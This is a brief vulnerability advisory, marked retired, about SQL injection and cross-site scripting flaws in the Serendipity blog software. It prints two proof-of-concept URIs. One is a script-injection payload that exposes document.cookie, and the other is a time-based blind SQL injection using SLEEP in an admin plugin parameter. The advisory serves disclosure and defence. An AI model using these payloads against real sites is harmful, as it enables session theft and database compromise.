RETIRED: Serendipity SQL Injection and Cross Site Scripting Vulnerabilities

RETIRED: Serendipity SQL Injection and Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.

The following example URIs are available:

http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='";</script><script>alert(document.cookie)</script>

http://www.example.com/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1&apos; OR
SLEEP(10)=0 LIMIT 1--+